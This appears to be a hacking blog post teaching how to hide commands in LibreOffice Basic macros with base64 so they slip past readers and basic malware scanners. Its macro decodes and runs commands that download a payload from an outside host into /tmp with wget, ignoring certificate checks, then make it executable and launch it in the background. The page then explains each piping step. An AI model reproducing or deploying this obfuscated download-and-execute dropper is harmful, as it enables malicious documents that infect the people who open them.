You are here: Home Articles Libreoffice base64 encoded macros

Libreoffice base64 encoded macros

Details
Category: Articles
Hits: 695

A bit of fun with base64 encoded macros in Libreoffice. Read  Libreoffice macros first to get the basics of macro based malware :)

So, first, why on earth would we encode our strings in base64 ?. Hopefully to fool anyone looking in the macro, or the most basic malware scanning engines.
The trouble is that we can't be sure there's a base64 converter present on the target system, so sometimes, this approach will fail, and we revert to the basic one, without obfuscation.
But, let's look at how to throw some base64 strings into a macro, shall we :)

Sub Main
Shell "bash -c 'echo d2dldCBodHRwczovLzEwLjAuMC45My9wYXlsb2Fkcy9QT1BVTEFSX1RST1VUIC0tbm8tY2hlY2stY2VydGlmaWNhdGUgLU8gL3RtcC9QT1BVTEFSX1RST1VUCg== | base64 -d | /bin/bash'"
wait 10000
Shell "bash -c 'echo Y2htb2QgK3ggL3RtcC9QT1BVTEFSX1RST1VUCg== | base64 -d | /bin/bash'"
Shell "bash -c 'echo L3RtcC9QT1BVTEFSX1RST1VUCg== | base64 -d | /bin/bash &'"
End Sub

There's a couple of components to all this, so let's go through them one by one. First, how do we code and decode base64 in linux ?

echo "this is a test" | base64
dGhpcyBpcyBhIHRlc3QK

We use the echo command, followed byt the input in " ", and last we pipe it through to the base64 encoding function.

echo "dGhpcyBpcyBhIHRlc3QK" | base64 -d
this is a test

And decoding it with the -d option to base64.

So, all our commands can be obfuscated with base64, and decoed before execution. Now, there's one problem. When we pipe it to base64 -d, it only decodes, it doesn't execute in bash, for that we have to run one last pipe, this time to bash itself.

Shell "bash -c 'echo Y2htb2QgK3ggL3RtcC9QT1BVTEFSX1RST1VUCg== | base64 -d | /bin/bash'"
Shell "bash -c 'echo L3RtcC9QT1BVTEFSX1RST1VUCg== | base64 -d | /bin/bash &'"

These two lines shows that.
In line one, we tell Libreoffice to run bash with a command, using -c, then we pipe that output into the decoder function, and converts it using base64, and finally we pipe it through to bash for execution.

Line two is the same, except that we end with a & to escape the last bash process to the background, so it still runs if we quit Libreoffice.

I know it doesn't protect against seeing what servers it downloads from,that is simply copying the base64 input string and pipe to base64 -d to get the original output, so it's obfuscation, NOT encryption ;)

Now, if my theory is correct, we could make this as a oneliner, instead of doing each input on a new line, I will have to try that, and will post it here as an edit when that's done :)

Happy hacking ;)


You have no rights to post comments